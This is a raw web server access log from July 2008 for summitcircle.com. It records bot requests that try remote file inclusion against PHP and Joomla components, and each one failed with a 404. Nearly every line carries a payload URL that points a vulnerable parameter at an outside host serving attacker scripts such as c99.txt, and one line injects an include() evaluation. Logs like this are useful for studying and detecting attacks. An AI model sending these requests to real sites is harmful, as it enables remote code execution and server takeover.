216.246.91.250 - - [20/Jul/2008:17:31:55 -0700] "GET /logs/index.php?url=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:31:55 -0700] "GET /index.php?url=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:31:56 -0700] "GET /logs/access_080421.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
210.127.253.161 - - [20/Jul/2008:17:32:18 -0700] "GET /logs/access_071224.log///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.127.253.161 - - [20/Jul/2008:17:32:19 -0700] "GET ///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.127.253.161 - - [20/Jul/2008:17:32:19 -0700] "GET /logs///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:32:29 -0700] "GET /logs/access_080602.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:32:29 -0700] "GET /errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:32:29 -0700] "GET /logs/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.29.4.54 - - [20/Jul/2008:17:32:35 -0700] "GET /logs/access_080210.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
67.19.74.194 - - [20/Jul/2008:17:32:37 -0700] "GET /logs/access_071210.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.19.74.194 - - [20/Jul/2008:17:32:37 -0700] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.19.74.194 - - [20/Jul/2008:17:32:37 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:32:50 -0700] "GET /logs/access_080121.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:32:50 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:32:50 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
70.86.134.34 - - [20/Jul/2008:17:33:14 -0700] "GET /logs/access_071210.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
70.86.134.34 - - [20/Jul/2008:17:33:14 -0700] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
70.86.134.34 - - [20/Jul/2008:17:33:14 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.19.74.194 - - [20/Jul/2008:17:33:32 -0700] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
87.106.65.144 - - [20/Jul/2008:17:33:35 -0700] "GET /logs/access_080421.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:33:40 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:33:41 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:33:41 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:33:41 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:34:10 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:34:10 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:34:10 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:34:11 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:34:21 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:34:21 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:34:21 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "summitcircle.com"
216.246.91.250 - - [20/Jul/2008:17:34:22 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
210.127.253.161 - - [20/Jul/2008:17:35:12 -0700] "GET /logs/access_080121.log///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
218.38.12.93 - - [20/Jul/2008:17:35:20 -0700] "GET /logs/access_080414.log///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.86.134.34 - - [20/Jul/2008:17:36:20 -0700] "GET /logs/access_071210.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
70.86.134.34 - - [20/Jul/2008:17:36:20 -0700] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
70.86.134.34 - - [20/Jul/2008:17:36:20 -0700] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.87.80 - - [20/Jul/2008:17:36:36 -0700] "GET /announcements.php?phpraid_dir=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.summitcircle.com"
72.29.87.80 - - [20/Jul/2008:17:36:37 -0700] "GET /logs/announcements.php?phpraid_dir=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.summitcircle.com"
67.19.74.194 - - [20/Jul/2008:17:36:39 -0700] "GET /logs/access_071111.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.8.105.21 - - [20/Jul/2008:17:37:06 -0700] "GET /logs/access_070903.log//skin/zero_vote/error.php?dir=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.8.105.21 - - [20/Jul/2008:17:37:06 -0700] "GET //skin/zero_vote/error.php?dir=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.8.105.21 - - [20/Jul/2008:17:37:06 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.8.105.21 - - [20/Jul/2008:17:37:15 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:37:25 -0700] "GET /logs/access_080602.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:37:25 -0700] "GET /errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:37:25 -0700] "GET /logs/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
67.19.74.194 - - [20/Jul/2008:17:37:35 -0700] "GET /logs/access_071210.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.19.74.194 - - [20/Jul/2008:17:37:35 -0700] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.19.74.194 - - [20/Jul/2008:17:37:36 -0700] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
210.127.253.161 - - [20/Jul/2008:17:37:40 -0700] "GET /logs///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.127.253.161 - - [20/Jul/2008:17:37:41 -0700] "GET ///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:37:53 -0700] "GET /%3Cbug%3Ehttp://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:37:53 -0700] "GET /logs/%3Cbug%3Ehttp://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.summitcircle.com"
75.125.201.18 - - [20/Jul/2008:17:38:17 -0700] "GET /logs/access_080421.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
70.86.134.34 - - [20/Jul/2008:17:38:18 -0700] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
195.5.163.212 - - [20/Jul/2008:17:39:07 -0700] "GET /includes/get_header.php?vwar_root=http://purearcade.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.summitcircle.com"
195.5.163.212 - - [20/Jul/2008:17:39:07 -0700] "GET /logs/includes/get_header.php?vwar_root=http://purearcade.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.summitcircle.com"
210.127.253.161 - - [20/Jul/2008:17:39:16 -0700] "GET /logs/access_080414.log///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.86.134.34 - - [20/Jul/2008:17:40:01 -0700] "GET /logs/access_071111.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
217.217.156.81 - - [20/Jul/2008:17:41:12 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
217.217.156.81 - - [20/Jul/2008:17:41:20 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
216.104.34.70 - - [20/Jul/2008:17:41:50 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
216.104.34.70 - - [20/Jul/2008:17:41:50 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
207.44.230.33 - - [20/Jul/2008:17:41:57 -0700] "GET /logs/access_080602.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.104.34.70 - - [20/Jul/2008:17:42:43 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "summitcircle.com"
216.104.34.70 - - [20/Jul/2008:17:42:43 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "summitcircle.com"
168.209.97.34 - - [20/Jul/2008:17:43:02 -0700] "GET /logs//main.php?sayfa=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "summitcircle.com"
168.209.97.34 - - [20/Jul/2008:17:43:02 -0700] "GET //main.php?sayfa=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "summitcircle.com"
69.72.153.58 - - [20/Jul/2008:17:43:07 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.summitcircle.com"
69.72.153.58 - - [20/Jul/2008:17:43:07 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.summitcircle.com"
70.86.134.34 - - [20/Jul/2008:17:45:06 -0700] "GET /logs/access_070826.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
62.212.130.170 - - [20/Jul/2008:17:46:13 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.summitcircle.com"
62.212.130.170 - - [20/Jul/2008:17:46:13 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.summitcircle.com"
189.73.196.247 - - [20/Jul/2008:17:46:27 -0700] "GET /logs/access_071224.log/index.php?pagina=http://h1.ripway.com/heidik/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
189.73.196.247 - - [20/Jul/2008:17:46:28 -0700] "GET /logs/index.php?pagina=http://h1.ripway.com/heidik/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
195.5.163.212 - - [20/Jul/2008:17:46:48 -0700] "GET /event.php?myevent_path=http://purearcade.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.summitcircle.com"
195.5.163.212 - - [20/Jul/2008:17:46:49 -0700] "GET /logs/event.php?myevent_path=http://purearcade.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.summitcircle.com"
195.5.163.212 - - [20/Jul/2008:17:47:04 -0700] "GET /lib/armygame.php?libpath=http://purearcade.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.summitcircle.com"
195.5.163.212 - - [20/Jul/2008:17:47:04 -0700] "GET /logs/lib/armygame.php?libpath=http://purearcade.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.summitcircle.com"
189.73.196.247 - - [20/Jul/2008:17:47:37 -0700] "GET /logs/access_080526.log/index.php?pagina=http://h1.ripway.com/heidik/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
216.104.34.70 - - [20/Jul/2008:17:48:20 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "summitcircle.com"
216.104.34.70 - - [20/Jul/2008:17:48:20 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "summitcircle.com"
168.209.97.34 - - [20/Jul/2008:17:49:58 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.summitcircle.com"
168.209.97.34 - - [20/Jul/2008:17:49:58 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.summitcircle.com"
211.60.155.3 - - [20/Jul/2008:17:50:36 -0700] "GET /logs//index.php?option=com_dtregister&eventId=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
211.60.155.3 - - [20/Jul/2008:17:50:36 -0700] "GET //index.php?option=com_dtregister&eventId=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
217.217.156.81 - - [20/Jul/2008:17:50:56 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
217.217.156.81 - - [20/Jul/2008:17:50:57 -0700] "GET //skin/zero_vote/error.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
91.151.100.50 - - [20/Jul/2008:17:50:58 -0700] "GET /logs/access_080526.log/index.php?show=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
91.151.100.50 - - [20/Jul/2008:17:50:59 -0700] "GET /logs/index.php?show=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
91.151.100.50 - - [20/Jul/2008:17:51:01 -0700] "GET /index.php?show=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
209.62.26.66 - - [20/Jul/2008:17:51:35 -0700] "GET /logs/access_070826.log/index.php?go=http:/eskisiben.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
209.62.26.66 - - [20/Jul/2008:17:51:35 -0700] "GET /logs/index.php?go=http:/eskisiben.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
209.62.26.66 - - [20/Jul/2008:17:51:35 -0700] "GET /index.php?go=http:/eskisiben.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
209.62.26.66 - - [20/Jul/2008:17:51:36 -0700] "GET /logs/access_070820.log/index.php?go=http:/eskisiben.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
195.32.96.7 - - [20/Jul/2008:17:51:42 -0700] "GET /logs/access_071022.log/!scanhttp://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
195.32.96.7 - - [20/Jul/2008:17:51:42 -0700] "GET /!scanhttp://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
195.32.96.7 - - [20/Jul/2008:17:51:43 -0700] "GET /logs/!scanhttp://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
85.114.135.126 - - [20/Jul/2008:17:53:08 -0700] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.114.135.126 - - [20/Jul/2008:17:53:09 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.114.135.126 - - [20/Jul/2008:17:53:09 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.29.87.80 - - [20/Jul/2008:17:53:25 -0700] "GET /logs/access_071022.log//components/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
72.29.87.80 - - [20/Jul/2008:17:53:25 -0700] "GET //components/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
